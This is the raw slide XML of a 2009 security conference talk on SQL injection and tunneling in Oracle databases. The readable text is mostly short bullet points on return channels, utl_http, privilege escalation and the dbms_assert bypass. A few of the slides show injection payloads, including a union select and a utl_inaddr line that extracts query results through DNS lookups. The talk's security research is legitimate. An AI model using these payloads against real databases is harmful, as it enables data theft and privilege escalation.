                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4061" y="4583"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4372" y="4865"/>
                        <a:pt x="4814" y="4805"/>
                        <a:pt x="5194" y="4442"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5472" y="4174"/>
                        <a:pt x="5498" y="3552"/>
                        <a:pt x="5283" y="3320"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5161" y="3193"/>
                        <a:pt x="940" y="146"/>
                        <a:pt x="940" y="146"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="940" y="146"/>
                        <a:pt x="870" y="93"/>
                        <a:pt x="830" y="70"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="755" y="29"/>
                        <a:pt x="669" y="0"/>
                        <a:pt x="528" y="10"/>
                      </a:cubicBez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157840" y="982440"/>
                  <a:ext cx="327240" cy="252000"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst/>
                  <a:ahLst/>
                  <a:rect l="l" t="t" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="4511" h="3509">
                      <a:moveTo>
                        <a:pt x="4477" y="3463"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="4444" y="3509"/>
                        <a:pt x="4360" y="3504"/>
                        <a:pt x="4293" y="3451"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="96" y="218"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="165"/>
                        <a:pt x="0" y="88"/>
                        <a:pt x="36" y="43"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="36" y="43"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="69" y="0"/>
                        <a:pt x="151" y="5"/>
                        <a:pt x="218" y="57"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4418" y="3291"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4485" y="3341"/>
                        <a:pt x="4511" y="3420"/>
                        <a:pt x="4477" y="3463"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4477" y="3463"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="bdbd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128320" y="1006560"/>
                  <a:ext cx="366840" cy="317520"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst/>
                  <a:ahLst/>
                  <a:rect l="l" t="t" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="5056" h="4410">
                      <a:moveTo>
                        <a:pt x="199" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="199" y="0"/>
                        <a:pt x="0" y="268"/>
                        <a:pt x="153" y="500"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="4037" y="4090"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="4037" y="4090"/>
                        <a:pt x="4513" y="4410"/>
                        <a:pt x="5056" y="3817"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5056" y="3817"/>
                        <a:pt x="4674" y="4006"/>
                        <a:pt x="4425" y="3865"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4179" y="3724"/>
                        <a:pt x="414" y="287"/>
                        <a:pt x="414" y="287"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="414" y="287"/>
                        <a:pt x="263" y="184"/>
                        <a:pt x="199" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="46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2" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8737560" y="6829560"/>
            <a:ext cx="311040" cy="14904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844120" y="6873840"/>
            <a:ext cx="463320" cy="216000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="b501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285120" y="6978600"/>
            <a:ext cx="155880" cy="204840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="d0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Num" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8844120" y="6870600"/>
            <a:ext cx="3981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B886-5FE2-4974-8577-F32F2FE9981E}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1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3722760" y="1895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60360" y="6924600"/>
            <a:ext cx="2879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57575"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>4 – Confidential (Staf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dt" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4568400" y="6895800"/>
            <a:ext cx="8859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57575"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS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DB2E-5849-4667-BFEE-584092181B63}" type="datetime">
              <a:rPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="757575"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea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143240" y="6924600"/>
            <a:ext cx="1016280" cy="1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1800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57575"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Copyright </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="757575"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>©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76200" y="1450800"/>
            <a:ext cx="71978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52022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Oracle : A new Hop</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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79440" y="6040440"/>
            <a:ext cx="71978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48587"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Erwan Abgrall (Security Engineer)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="848587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48587"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Erwan.abgrall@kereval.com</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="848587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48587"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>2009-10-24</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="848587"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name=""/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1276200" y="2563920"/>
            <a:ext cx="71978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36466"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Oracle Tunneling How-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02D93-A881-47A9-83F2-2E430C45620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1E9DE5-08B7-46A2-A626-BF6DB82C57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04920" y="34560"/>
            <a:ext cx="7197840" cy="863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2022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>SQL Injection in Oracle</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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48920" y="1258560"/>
            <a:ext cx="8853480" cy="55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202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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Extending the return channel with XML</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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Dbms_xmlgen.getxml(‘selec stuff from table’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roduce a xml output of the res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Escape problematic charac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Response Still limited to a URL s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DD66-9061-4279-9B2A-13C2A697FB3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5A42043-1661-422F-B14A-9A48A587F6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04920" y="34560"/>
            <a:ext cx="7197840" cy="863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d52022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Tunneling through Oracle</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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48920" y="1258560"/>
            <a:ext cx="8853480" cy="55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202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202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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Using utl_http.request()</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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imited response s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Good for host discov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Only G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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Using utl_http PL/SQL procedures</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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Executes only inside a PL/SQL Block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Support GET , POST, HTT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D8C0-03FA-4FB7-83CD-F3252BF9FE8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F562161-1EE7-43FF-905E-F3191A44BA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104920" y="34560"/>
            <a:ext cx="7197840" cy="863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d52022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Tunneling through Oracle</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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48920" y="1258560"/>
            <a:ext cx="8853480" cy="55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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Injecting a standard PL/SQL Function</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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Watch for advisories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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Version &lt; 10.2.0.2</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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SYS.dbms_export_extension.get_domain_index_t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Evading  dbms_assert using a  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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
              </a:rPr>
              <a:t>Version &gt;= 10.2.0.2</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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Arial"/>
              </a:rPr>
              <a:t>Dbms_xmlquery.getxml() allow execution of a PL/SQL  bl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Arial"/>
              </a:rPr>
              <a:t>Dbms_metadata.ged_ddl() allow the execution of a function with SYSTEM privile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Arial"/>
              </a:rPr>
              <a:t>You need both to become DB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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Injecting a custom PL/SQL Function</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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Using the http return chann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Quite time consu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ACE4-B4DC-44C6-A8EE-AEA16A0DBCF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5F24727-E7B5-467F-8E5B-C5584D29AE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04920" y="34560"/>
            <a:ext cx="7197840" cy="863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2022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Future of Oracle exploitation</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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48920" y="1258560"/>
            <a:ext cx="8853480" cy="55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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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Exploiting the TNS Liste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Built in modules for privilege esca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llow execution of PL/SQL bl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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>BsqlBF</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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Oracle Command execution throug a sql injection </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="fr-F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Same exploitation logic as sh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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Oracle Worm ?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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Rootkit in oracle concept allready disclo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ropagation through SQL inj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&amp;C channel using http, dns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CE4D-0DE7-49D3-AAC0-DB37945BBAB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A0B0375-5B20-41C9-A212-D2383742FE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815840" y="4677840"/>
            <a:ext cx="61182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2022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Questions</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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815840" y="5908680"/>
            <a:ext cx="61182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57575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6EB7E-AE6A-469B-90F4-93F05A8C9CF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5E9E6483-D617-4521-9E5D-85283BC335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04920" y="34560"/>
            <a:ext cx="7197840" cy="863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2022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Agenda</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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48920" y="1258560"/>
            <a:ext cx="8853480" cy="55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52022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2022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>The Oracle world</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d5202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202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52022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2022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SQL Injection on Oracle DBs</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d5202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202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52022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2022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Tunneling through Oracle</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d5202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202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52022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2022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Questions ?</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d520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D4C9-8E63-448D-9314-4D6EF5E3ED5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DE9F5C2-8E49-41D1-9FA4-FC59D7A139A4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04920" y="34560"/>
            <a:ext cx="7197840" cy="863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2022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>The Oracle World</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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48920" y="1258560"/>
            <a:ext cx="8853480" cy="55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202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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>N°1 Relational Database</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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48.9 % market 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N°1 on Linux with 75.8% sh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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Tons of Features</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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Java VM emb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0680">
              <a:spcBef>
                <a:spcPts val="499"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="636466"/>
              </a:buClr>
              <a:buSzPct val="80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36466"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Very popular language</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="6364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XML stuffs for Web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0680">
              <a:spcBef>
                <a:spcPts val="499"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="636466"/>
              </a:buClr>
              <a:buSzPct val="80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36466"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Service hackers too….</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="636466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19EC-065D-4076-97AC-8B5E7506847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D1CC9CE-4161-440C-837A-F0F68E8AFB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04920" y="34560"/>
            <a:ext cx="7197840" cy="863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2022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>The Oracle World</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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49280" y="1258920"/>
            <a:ext cx="8853480" cy="55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52022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202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52022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2022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Unpatched Versions for Trial</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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ly used in development / testing environ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ly off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ly harmless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52022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202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52022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202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52022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2022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Pay for updates</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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acle’s doing a good job patching vulnerabil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PU patch make’s it saf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applied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0680">
              <a:spcBef>
                <a:spcPts val="499"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="636466"/>
              </a:buClr>
              <a:buSzPct val="80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466"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>10% never patch (IOUG study)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="6364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52022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2022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388360" y="3576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8FB5-57B6-450F-8AE6-EA70977B93FF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14E8C98-E97E-4FD1-AEB3-F3ACDED8C5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04920" y="34560"/>
            <a:ext cx="7197840" cy="863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2022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>The Oracle World</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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48920" y="1258560"/>
            <a:ext cx="8853480" cy="55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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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ccess data’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all to pl/sql fu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ccess database specific t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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>PL/SQL</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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Define custom functions &amp; proced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Definitions executed inside an anonymous pl/sql bl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ots of pack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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Java</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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Need specific privile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Defined inside pl/sql bl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an execute system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707F-DB13-4565-9334-C32E634E3B5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12191C1-A4D3-473A-B92D-D0F50CD950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04920" y="34560"/>
            <a:ext cx="7197840" cy="863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2022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>The Oracle World</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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48920" y="1258560"/>
            <a:ext cx="8853480" cy="55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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Security Features</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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ccess Control &amp; Poli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0680">
              <a:spcBef>
                <a:spcPts val="499"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="636466"/>
              </a:buClr>
              <a:buSzPct val="80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36466"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Privileges (select, insert, execute…)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="636466"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-220680">
              <a:spcBef>
                <a:spcPts val="499"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="636466"/>
              </a:buClr>
              <a:buSzPct val="80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36466"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Set Access to packages like tables</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="636466"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-220680">
              <a:spcBef>
                <a:spcPts val="499"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="636466"/>
              </a:buClr>
              <a:buSzPct val="80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36466"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Views (partial access to a given set of elements)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="636466"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-220680">
              <a:spcBef>
                <a:spcPts val="499"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="636466"/>
              </a:buClr>
              <a:buSzPct val="80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36466"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Ip access control to the listener</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="6364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Strong cryptography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Sanitizing fu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0680">
              <a:spcBef>
                <a:spcPts val="499"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="636466"/>
              </a:buClr>
              <a:buSzPct val="80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36466"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>DBMS_Assert</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="6364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DBA=ro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0680">
              <a:spcBef>
                <a:spcPts val="499"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="636466"/>
              </a:buClr>
              <a:buSzPct val="80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36466"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Privilege escalation is still possible</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="6364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E0AF-FBC6-45AA-9DBD-B12DBC8A25C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4658332-1801-4BD1-A7EC-3ED8A6F8E1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104920" y="34560"/>
            <a:ext cx="7197840" cy="863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2022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>SQL Injection in Oracle</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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48920" y="1258560"/>
            <a:ext cx="8853480" cy="55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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Evil quote</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Comment the end of the query</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Nested queries</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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Select stuff from table where 1=(select 1 from du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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Call PL/SQL functions</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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Select function() from d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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>No stacked queries</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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In ge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ust inject a pl/sql function to execute several queries in a single inj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C834-E5AA-4695-8C3E-1F69A19457F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1F394D4-8D56-49B4-8D78-A9D9BBCB54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104920" y="34560"/>
            <a:ext cx="7197840" cy="863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2022"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>SQL Injection in Oracle</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet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48920" y="1258560"/>
            <a:ext cx="8853480" cy="55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52022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52022"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>Available Return Channels</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="d52022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0680">
              <a:spcBef>
                <a:spcPts val="499"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="636466"/>
              </a:buClr>
              <a:buSzPct val="80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36466"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="fr-FR" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="636466"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>union (select 1,2,3, truc from bidule) - -’</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="6364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0680">
              <a:spcBef>
                <a:spcPts val="499"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="636466"/>
              </a:buClr>
              <a:buSzPct val="80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36466"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="fr-FR" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="636466"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>or 1=utl_inaddr.get_host_address((select string from table))- -’</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="636466"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-220680">
              <a:spcBef>
                <a:spcPts val="499"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="636466"/>
              </a:buClr>
              <a:buSzPct val="80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466"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="636466"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:rPr>
